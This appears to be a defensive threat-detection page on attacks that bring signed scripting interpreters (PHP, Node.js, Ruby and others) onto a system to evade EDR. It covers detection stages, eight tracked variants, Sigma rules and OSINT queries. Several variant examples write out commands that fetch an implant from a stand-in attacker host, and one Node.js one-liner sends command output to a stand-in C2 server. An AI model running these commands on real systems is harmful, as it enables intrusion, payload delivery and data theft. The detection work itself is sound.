← All Chokepoints HIGH

BYOSI Scripting Interpreters

Defense Evasion Execution T1059.006 T1059.007 T1059 T1027.010 T1218 Detection difficulty: HIGH Prevalence: EMERGING

Adversaries bring legitimate, vendor-signed scripting interpreters (Python, PHP, Node.js, Ruby, Perl, AutoHotKey, etc.) onto a target system and execute malicious scripts through them, bypassing EDR solutions that focus on binary analysis and API hooking. Because every interpreter binary is validly signed by its vendor, EDRs whitelist or deprioritize the process. The malicious logic lives in plain-text script files that most EDR engines do not scan. The chokepoint is invariant: regardless of which interpreter is chosen, the attacker must (1) write or download a non-default interpreter binary to disk, (2) execute that interpreter as a new process, and (3) have the interpreter load and run attacker-controlled script content that performs the actual malicious action (C2 callback, credential theft, lateral movement). Each of these three stages produces telemetry that survives tool rotation across all 13+ supported interpreter languages.

By @iimp0ster · Updated 2026-03-29 · View source YAML

Attack Chokepoints 3 invariant stages

Each stage is an invariant condition the attacker must satisfy, regardless of tool, variant, or threat actor. Detection at any stage breaks the chain.

1 Interpreter Deployment
Prerequisites
  • Ability to write files to disk on the target system (interpreter binary + script payload)
  • The scripting interpreter must be a legitimately signed binary compatible with the target OS
  • Attacker-controlled script content must be accessible to the interpreter (local file, inline argument, or remote fetch)
  • No application whitelisting policy blocking execution of the specific interpreter binary from non-standard paths
Input Attacker has code execution on the target
Chokepoint A non-default scripting interpreter runtime must be introduced to the system, either written to disk as a standalone binary or loaded in-memory as embedded DLLs within a .NET host process (IronPython, Boolang)
Observable Disk-based: Sysmon EID 11 showing a vendor-signed interpreter binary (python.exe, php.exe, node.exe) written to a user-writable directory. In-memory: Sysmon EID 7 showing interpreter DLLs (IronPython.dll, Microsoft.Scripting.dll) loaded by a .NET host process.
Why unavoidable
The interpreter runtime is required to parse and execute scripts. It cannot be replaced by a native OS component without losing language compatibility. Whether deployed as a binary or embedded DLLs, the runtime must be present.
Data Sources
  • Sysmon Event ID 11 (File Create)
  • Sysmon Event ID 1 (Process Creation, archive extraction)
  • Windows Security Event ID 4688 (Process Creation)
View rule →
Interpreter runtime is available, either as a binary on d...
2 Interpreter Execution
Input Interpreter runtime is available, either as a binary on disk or as embedded DLLs in a host process
Chokepoint The non-default interpreter binary must be launched as a new process to run attacker scripts.
Observable Sysmon EID 1 showing python.exe, node.exe, php.exe, etc. running from a non-standard path (not Program Files). Command line may reveal the script being executed or inline code.
Why unavoidable
Script files require their matching interpreter process to execute. There is no way to run Python/PHP/Node scripts without spawning the interpreter.
Data Sources
  • Sysmon Event ID 1 (Process Creation)
  • Windows Security Event ID 4688 (Process Creation)
  • Sysmon Event ID 7 (Image Loaded, interpreter DLLs)
View rule →
Interpreter is running with attacker-controlled script co...
3 Malicious Script Action
Input Interpreter is running with attacker-controlled script content
Chokepoint The interpreter must load attacker-controlled script content and perform an observable action (network connection, file write, process spawn, credential access).
Observable Sysmon EID 3 showing outbound connections from the interpreter process. EID 1 showing child processes spawned by the interpreter. EID 11/12/13 showing file or registry modifications.
Why unavoidable
The script must interact with the OS to achieve its objective. C2 callbacks require network, data theft requires file/process access, persistence requires registry/filesystem writes.
Data Sources
  • Sysmon Event ID 3 (Network Connection)
  • Sysmon Event ID 1 (Child Process Creation)
  • Sysmon Event ID 11 (File Create)
  • Sysmon Event ID 12/13 (Registry Create/Set Value)
Bypass risk: If the interpreter uses built-in socket libraries for C2 without spawning child processes, detection relies on network telemetry from the interpreter process itself.
View rule →

Variations 8 variants tracked

Tools and methods that exploit this chokepoint. The list grows. The chokepoint doesn't change.

BYOSI PHP Shell (oldkingcone) 2024-Q2 Active
Original BYOSI proof-of-concept. Downloads PHP for Windows, extracts to C:\Temp\php, fetches a PHP implant script, and executes it. Four lines of PowerShell evade CrowdStrike, Trellix, and SentinelOne in tested environments. SentinelOne confirmed unable to scan PHP file types.
Command / artifacts
Original BYOSI PoC. Downloads official PHP for Windows, extracts to C:\Temp\php, fetches PHP implant, executes. SentinelOne confirmed unable to scan PHP file types.
# Four lines of PowerShell. Evaded CrowdStrike, Trellix, SentinelOne:
Invoke-WebRequest -Uri "hxxps[://]windows.php.net/downloads/releases/php-8.2.0-nts-Win32-vs16-x64.zip" -OutFile "$env:TEMP\php.zip"
Expand-Archive "$env:TEMP\php.zip" -DestinationPath "C:\Temp\php"
Invoke-WebRequest -Uri "hxxps[://]attacker[.]com/implant.php" -OutFile "C:\Temp\php\shell.php"
C:\Temp\php\php.exe C:\Temp\php\shell.php
  • Sysmon EID 11: php.exe written to C:\Temp\php\
  • Sysmon EID 1: php.exe running from non-standard path
  • Sysmon EID 3: php.exe making outbound C2 connection
Same chokepoint: PHP binary downloaded to TEMP → php.exe launched from non-standard path → C2 callback
Source: github.com →
PolyDrop (Multi-Language BYOSI) 2024-Q3 Active
Expanded BYOSI toolkit supporting 13 scripting languages (Python, Ruby, Perl, Lua, PHP, Node.js, Tcl, R, Dart, Deno, Bun, Nim, Crystal). Rapid payload deployment across Windows, macOS, and Linux. Vulners AI risk score 7.2 High.
Command / artifacts
Expanded BYOSI toolkit supporting 13 languages. Each interpreter is legitimately signed. EDR trusts the binary and cannot scan the script.
# Supports 13 languages. Example with Ruby:
Invoke-WebRequest -Uri "hxxps[://]github.com/.../rubyinstaller-3.2.2-1-x64.exe" -OutFile "$env:TEMP\ruby.exe"
Start-Process "$env:TEMP\ruby.exe" -ArgumentList "/silent" -Wait
Invoke-WebRequest -Uri "hxxps[://]attacker[.]com/payload.rb" -OutFile "$env:TEMP\payload.rb"
ruby.exe "$env:TEMP\payload.rb"
  • Sysmon EID 11: Non-default interpreter binary written to TEMP/AppData
  • Sysmon EID 1: Interpreter running from non-standard path
  • Sysmon EID 3: Interpreter making outbound C2 connection
Same chokepoint: Interpreter downloaded to TEMP → launched from non-standard path → script executes → C2 callback
Source: github.com →
IronNetInjector (Turla APT — IronPython BYOI) 2021-Q1 Active
Turla APT uses IronPython interpreter embedded via .NET to load malicious Python scripts that inject Turla tools into memory. Documented by Palo Alto Unit 42. Demonstrates nation-state adoption of BYOI tradecraft for in-memory execution without touching PowerShell.
Command / artifacts
Turla APT. Uses IronPython via .NET to avoid dropping python.exe. Loads malicious .py scripts in memory. Documented by Unit 42.
# IronPython embedded via .NET:
# Malicious Python scripts loaded into memory via IronPython runtime
# No python.exe on disk. Uses .NET-hosted IronPython DLLs
# Injects Turla tools into legitimate processes
  • Sysmon EID 7: IronPython DLLs loaded (IronPython.dll, Microsoft.Scripting.dll)
  • Sysmon EID 1: .NET host process loading IronPython assemblies
  • Memory: Python bytecode in non-Python process memory
Same chokepoint: .NET loads IronPython DLLs → Python scripts execute in-memory → Turla tools injected
Source: unit42.paloaltonetworks.com →
Node.js Malware Delivery (ClickFix → NodeLoader) 2025-Q1 Active
Microsoft documented threat actors downloading node.exe via PowerShell (often delivered through ClickFix social engineering) and executing inline JavaScript for C2 and data exfiltration. NodeLoader variant uses sudo-prompt module for privilege escalation, delivering cryptominers and infostealers.
Command / artifacts
Microsoft documented (April 2025). PowerShell downloads node.exe, inline JavaScript for C2 and exfil. NodeLoader uses sudo-prompt for privesc.
# Delivered via ClickFix, then:
powershell -c "Invoke-WebRequest -Uri 'hxxps[://]nodejs[.]org/dist/v20.0.0/node-v20.0.0-win-x64.zip' -OutFile node.zip"
Expand-Archive node.zip -DestinationPath C:\Users\Public\node
C:\Users\Public\node\node.exe -e "require('child_process').exec('whoami',function(e,o){require('https').request({hostname:'c2[.]attacker[.]com',path:'/'+o})})"
  • Sysmon EID 11: node.exe written to Users\Public or AppData
  • Sysmon EID 1: node.exe with -e flag and inline JavaScript
  • Sysmon EID 3: node.exe outbound to non-npm domain
Same chokepoint: node.exe downloaded to Public → node.exe -e inline JS → outbound C2 connection
Source: www.microsoft.com →
Lu0Bot (Node.js C2) 2023-Q2 Active
Node.js-based malware where the interpreter accepts encrypted JavaScript as input. Uses WMIC for system reconnaissance. Demonstrates portable Node.js runtime bundled with encrypted payload scripts for full C2 capability.
Command / artifacts
Node.js-based malware accepting encrypted JavaScript. WMIC for recon. Encryption prevents script content inspection by EDR.
node.exe --eval "<encrypted_js_payload>"
# Uses WMIC for system recon:
wmic computersystem get model
wmic os get caption
# C2 via encrypted WebSocket
  • Sysmon EID 1: node.exe with --eval flag and encrypted content
  • Sysmon EID 1: wmic.exe spawned by node.exe
  • Sysmon EID 3: node.exe WebSocket connection to C2
Same chokepoint: node.exe deployed → encrypted JS via --eval → WMIC recon → encrypted WebSocket C2
Source: any.run →
Python Bytecode Evasion (PYC Execution) 2023-Q4 Emerging
Attackers hide malicious logic in compiled Python bytecode (.pyc) files that are directly executable by the Python interpreter but invisible to security scanners that only inspect .py source files. ReversingLabs called it potentially the first supply chain attack exploiting PYC execution.
Command / artifacts
Pre-compiled Python bytecode (.pyc) bypasses text-based content scanning. The interpreter still must exist on disk and execute.
# Attacker pre-compiles Python scripts to .pyc bytecode:
python -m py_compile payload.py
# Deploys python.exe + payload.pyc:
python.exe payload.pyc
# .pyc files bypass text-based content scanning
  • Sysmon EID 11: python.exe + .pyc file written to non-standard path
  • Sysmon EID 1: python.exe executing .pyc file
Same chokepoint: python.exe + .pyc deployed → python.exe launched → bytecode executed → C2 callback
Source: www.csoonline.com →
BYOI .NET Embedded Interpreters (Boolang, IronPython) 2020-Q1 Active
Red team tradecraft embedding Boolang, IronPython, or other .NET-compatible interpreters inside C# assemblies. Executes third-party scripting languages entirely in memory via .NET runtime without touching PowerShell or cmd.exe. Popularized by Marcello Salvati (Black Hills InfoSec) at DerbyCon 2019.
Command / artifacts
Interpreter embedded within .NET application. No standalone binary to detect on disk. Scripts execute within the .NET host process memory.
# .NET application embeds Boolang or IronPython runtime:
# No standalone interpreter binary on disk
# Scripts loaded from embedded resources or fetched remotely
# Executes within the .NET host process
  • Sysmon EID 7: Boolang or IronPython DLLs loaded by .NET process
  • Sysmon EID 1: .NET host with interpreter-related assemblies
Same chokepoint: .NET host loads interpreter DLLs → scripts execute in-process → C2/payload actions
Source: www.blackhillsinfosec.com →
AutoHotKey Script Abuse 2024-Q1 Emerging
Threat actors bundle AutoHotKey interpreter with malicious .ahk scripts to deploy keyloggers, credential stealers, and RATs. The AHK interpreter is signed and trusted, allowing script execution to bypass application whitelisting.
Command / artifacts
Legitimate automation tool. Attacker brings interpreter + .ahk script. The .ahk file type is not scanned by most EDR products.
AutoHotkey.exe malicious_script.ahk
# AHK scripts can: keylog via SetWindowsHookEx, screenshot, execute shell commands, establish C2 via WinHTTP COM
  • Sysmon EID 11: AutoHotkey.exe written to non-standard path
  • Sysmon EID 1: AutoHotkey.exe running from AppData/Temp
  • Sysmon EID 3: AutoHotkey.exe outbound C2
Same chokepoint: AutoHotkey.exe + .ahk script deployed → interpreter launched → keylogging/C2 → exfil
Source: www.mcafee.com →

Detection Strategy

Rules organized by the chokepoint stage they detect. Each stage has one or more rules at different maturity levels.

1 Interpreter Deployment
2 Interpreter Execution
Non-default interpreter executing from suspicious path with script argument o...
Hunt Med FP
Goal
Non-default interpreter executing from suspicious path with script argument or network activity
Log Sources
  • Sysmon Event ID 1 (Process Creation)
  • Sysmon Event ID 3 (Network Connection)
  • Windows Security Event ID 4688 (Process Creation)
FP Rate
Medium
Use Case
Active threat hunting for BYOSI deployment. Correlates interpreter execution with script loading or network callback, the two behaviors that distinguish malicious from benign interpreter presence.
Detection Logic
Interpreter process from outside an approved development directory AND one of: CommandLine references a script file (.py, .pyc, .php, .js, .rb, .pl, .lua, .tcl, .r, .ahk, .dart, .ts), OR CommandLine uses inline execution flags (-e, -c, --eval, -exec, -r), OR within 60 seconds the process opens an outbound connection to a non-RFC1918 destination. Exclude CI/CD runners and developer workstations by hostname or OU.
Sigma Rule — Hunt Level
GitHub → Download 
title: Non-Default Interpreter Executing Script or Making Network Connection
id: c4a8b2e3-9d5f-4a0c-b3e7-2f6d0a1c4b9e
status: experimental
description: >
  Detects scripting interpreters from non-standard paths referencing script files,
  using inline execution flags, or making outbound connections.
references:
  - https://github.com/oldkingcone/BYOSI
  - https://github.com/MalwareSupportGroup/PolyDrop
  - https://attack.mitre.org/techniques/T1059/006/
  - https://attack.mitre.org/techniques/T1059/007/
  - https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/
author: "@iimp0ster"
date: 2026/03/29
tags:
  - attack.defense_evasion
  - attack.execution
  - attack.t1059.006
  - attack.t1059.007
  - detection.maturity.hunt
logsource:
  category: process_creation
  product: windows
detection:
  selection_interpreters:
    Image|endswith:
      - '\python.exe'
      - '\python3.exe'
      - '\pythonw.exe'
      - '\php.exe'
      - '\php-cgi.exe'
      - '\node.exe'
      - '\ruby.exe'
      - '\perl.exe'
      - '\lua.exe'
      - '\AutoHotkey.exe'
      - '\AutoHotkey64.exe'
      - '\deno.exe'
      - '\bun.exe'
  selection_unusual_path:
    Image|contains:
      - '\Temp\'
      - '\tmp\'
      - '\Downloads\'
      - '\AppData\'
      - '\Users\Public\'
      - '\Windows\Temp\'
      - '\ProgramData\'
  selection_script_args:
    CommandLine|contains:
      - '.py'
      - '.pyc'
      - '.pyw'
      - '.php'
      - '.js'
      - '.mjs'
      - '.rb'
      - '.pl'
      - '.lua'
      - '.tcl'
      - '.ahk'
      - '.ts'
  selection_inline_exec:
    CommandLine|contains:
      - ' -e '
      - ' -c '
      - ' --eval '
      - ' -exec '
      - ' -r '
      - ' --require '
      - ' -E '
  filter_dev_tools:
    Image|contains:
      - '\Program Files\'
      - '\Program Files (x86)\'
      - '\Anaconda'
      - '\Miniconda'
      - '\scoop\apps\'
  filter_npm_yarn:
    ParentImage|endswith:
      - '\npm.cmd'
      - '\yarn.cmd'
      - '\npx.cmd'
    CommandLine|contains:
      - 'node_modules'
  filter_legit_software:
    # Tune for your environment — add legitimate software that triggers this rule
    Image|endswith:
      - '\placeholder_tune_for_your_env.exe'
  condition: selection_interpreters and selection_unusual_path and (selection_script_args or selection_inline_exec) and not filter_dev_tools and not filter_npm_yarn and not filter_legit_software
falsepositives:
  - Developers running scripts from temporary build directories
  - Software installers with embedded Python/Node.js scripts
  - IT automation tools deploying from non-standard paths
level: medium
Non-default interpreter spawned by suspicious parent, executing scripts from ...
Analyst Low FP
Goal
Non-default interpreter spawned by suspicious parent, executing scripts from temp paths with outbound C2
Log Sources
  • Sysmon Event ID 1 (Process Creation)
  • Sysmon Event ID 3 (Network Connection)
  • Sysmon Event ID 11 (File Create)
  • Windows Security Event ID 4688 (Process Creation)
FP Rate
Low
Use Case
SOC alerting; direct escalation trigger for active BYOSI deployment. The three-stage correlation (interpreter drop → execution → C2 callback) is highly specific to malicious BYOSI activity. Treat as active intrusion indicator.
Detection Logic
Within a 120-second window: interpreter binary dropped to C:\Temp, %APPDATA%, %LOCALAPPDATA%, Downloads, or Windows\Temp, THEN executed with parent powershell/cmd/wscript/mshta/explorer and CommandLine referencing a temp-dir script or inline execution flags, THEN outbound to a non-RFC1918, non-Microsoft IP. Exclude developer machines, CI/CD build agents, and package manager update processes.
Sigma Rule — Analyst Level
GitHub → Download 
title: Interpreter Dropped to Temp Path Then Executed by Suspicious Parent with Network Callback
id: d5b9c3f4-ae6a-4b1d-c4f8-3a7e1b2d5c0f
status: experimental
description: >
  Detects scripting interpreters from temp directories launched by suspicious parents
  with command-line references to script files or inline execution flags.
references:
  - https://github.com/oldkingcone/BYOSI
  - https://github.com/MalwareSupportGroup/PolyDrop
  - https://attack.mitre.org/techniques/T1059/006/
  - https://attack.mitre.org/techniques/T1059/007/
  - https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/
  - https://unit42.paloaltonetworks.com/ironnetinjector/
author: "@iimp0ster"
date: 2026/03/29
tags:
  - attack.defense_evasion
  - attack.execution
  - attack.t1059.006
  - attack.t1059.007
  - detection.maturity.analyst
logsource:
  category: process_creation
  product: windows
detection:
  selection_interpreters:
    Image|endswith:
      - '\python.exe'
      - '\python3.exe'
      - '\pythonw.exe'
      - '\php.exe'
      - '\php-cgi.exe'
      - '\node.exe'
      - '\ruby.exe'
      - '\perl.exe'
      - '\lua.exe'
      - '\AutoHotkey.exe'
      - '\AutoHotkey64.exe'
      - '\deno.exe'
      - '\bun.exe'
  selection_temp_path:
    Image|contains:
      - '\Temp\'
      - '\tmp\'
      - '\Downloads\'
      - '\AppData\Local\Temp\'
      - '\AppData\Roaming\'
      - '\Users\Public\'
      - '\Windows\Temp\'
  selection_suspicious_parent:
    ParentImage|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\cscript.exe'
      - '\mshta.exe'
      - '\explorer.exe'
      - '\wt.exe'
      - '\WindowsTerminal.exe'
  selection_script_or_inline:
    - CommandLine|contains:
        - '.py'
        - '.pyc'
        - '.php'
        - '.js'
        - '.mjs'
        - '.rb'
        - '.pl'
        - '.lua'
        - '.ahk'
    - CommandLine|contains:
        - ' -e '
        - ' -c '
        - ' --eval '
        - ' -exec '
  filter_known_legit:
    # Package managers and known dev toolchains
    CommandLine|contains:
      - 'pip install'
      - 'npm install'
      - 'npm run'
      - 'yarn '
      - 'composer '
      - 'bundle install'
      - 'gem install'
  filter_legit_software:
    # Tune for your environment — add legitimate software that triggers this rule
    Image|endswith:
      - '\placeholder_tune_for_your_env.exe'
  condition: selection_interpreters and selection_temp_path and selection_suspicious_parent and selection_script_or_inline and not filter_known_legit and not filter_legit_software
falsepositives:
  - Rare edge case of legitimate software using PowerShell to invoke a portable interpreter from temp
  - Some enterprise deployment tools that stage interpreters in temp directories
level: high
3 Malicious Script Action
Detect non-default scripting interpreter binaries appearing on systems where ...
Research High FP
Goal
Detect non-default scripting interpreter binaries appearing on systems where they are not expected
Log Sources
  • Sysmon Event ID 1 (Process Creation)
  • Sysmon Event ID 11 (File Create)
  • Windows Security Event ID 4688 (Process Creation)
FP Rate
High
Use Case
Baseline which interpreters exist in the environment. Identify systems where unexpected interpreters appear. Feed into allowlist for Hunt-level filtering.
Detection Logic
Any process creation or file create for known scripting interpreter binaries (python.exe, python3.exe, pythonw.exe, php.exe, php-cgi.exe, node.exe, ruby.exe, perl.exe, lua.exe, wish.exe, tclsh.exe, Rscript.exe, dart.exe, deno.exe, bun.exe, AutoHotkey.exe, AutoHotkey64.exe) from user-writable paths like C:\Temp, C:\Users\*\Downloads, C:\Users\*\AppData, or C:\Windows\Temp. Exclude Program Files, development tool directories, and package manager caches. Run to baseline the allowlist.
Sigma Rule — Research Level
GitHub → Download 
title: Non-Default Scripting Interpreter Execution from Unusual Path
id: b3f7a1d2-8c4e-4f9b-a2d6-1e5c9f0b3a8d
status: experimental
description: >
  Detects scripting interpreter binaries executing from non-standard paths. Baseline
  rule for mapping interpreter presence across the environment.
references:
  - https://github.com/oldkingcone/BYOSI
  - https://github.com/MalwareSupportGroup/PolyDrop
  - https://attack.mitre.org/techniques/T1059/006/
  - https://attack.mitre.org/techniques/T1059/007/
author: "@iimp0ster"
date: 2026/03/29
tags:
  - attack.defense_evasion
  - attack.execution
  - attack.t1059.006
  - attack.t1059.007
  - attack.t1059
  - detection.maturity.research
logsource:
  category: process_creation
  product: windows
detection:
  selection_interpreters:
    Image|endswith:
      - '\python.exe'
      - '\python3.exe'
      - '\pythonw.exe'
      - '\php.exe'
      - '\php-cgi.exe'
      - '\node.exe'
      - '\ruby.exe'
      - '\perl.exe'
      - '\lua.exe'
      - '\lua54.exe'
      - '\luajit.exe'
      - '\wish.exe'
      - '\tclsh.exe'
      - '\Rscript.exe'
      - '\dart.exe'
      - '\deno.exe'
      - '\bun.exe'
      - '\nim.exe'
      - '\crystal.exe'
      - '\AutoHotkey.exe'
      - '\AutoHotkey64.exe'
      - '\AutoHotkey32.exe'
  selection_suspicious_paths:
    Image|contains:
      - '\Temp\'
      - '\tmp\'
      - '\Downloads\'
      - '\AppData\Local\Temp\'
      - '\AppData\Roaming\'
      - '\Users\Public\'
      - '\Windows\Temp\'
      - '\ProgramData\'
      - '\Recycle'
  filter_known_dev_tools:
    Image|contains:
      - '\Program Files\'
      - '\Program Files (x86)\'
      - '\Chocolatey\'
      - '\nvm\v'
      - '\pyenv\'
      - '\Anaconda'
      - '\Miniconda'
      - '\WinPython'
      - '\scoop\apps\'
  filter_legit_software:
    # Tune for your environment — add legitimate software that triggers this rule
    Image|endswith:
      - '\placeholder_tune_for_your_env.exe'
  condition: selection_interpreters and selection_suspicious_paths and not filter_known_dev_tools and not filter_legit_software
falsepositives:
  - Legitimate software installers that bundle scripting interpreters temporarily
  - Developer testing from non-standard directories
  - CI/CD runners executing interpreters from workspace directories
  - Portable development environments (WinPython, portable Node.js)
level: low

OSINT Pivots

VirusTotal Intelligence behavior_processes:"php.exe" OR behavior_processes:"node.exe" OR behavior_processes:"python.exe" tag:drops-exe
Finds malware samples that drop or execute scripting interpreters. Pivot to behavior tab to extract interpreter delivery path and script payload filename.
GitHub Code Search "Invoke-WebRequest" "php" "extract" "C:\\Temp" OR "C:\\Users"
Finds PowerShell-based BYOSI delivery scripts that download and extract PHP (or other interpreters) to user-writable directories. Monitor for new delivery variants.
URLScan filename:php.exe OR filename:node.exe OR filename:python.exe OR filename:ruby.exe
Finds websites hosting interpreter binaries packaged in ZIP archives, a common BYOSI delivery mechanism. Cross-reference with known malware distribution domains.

References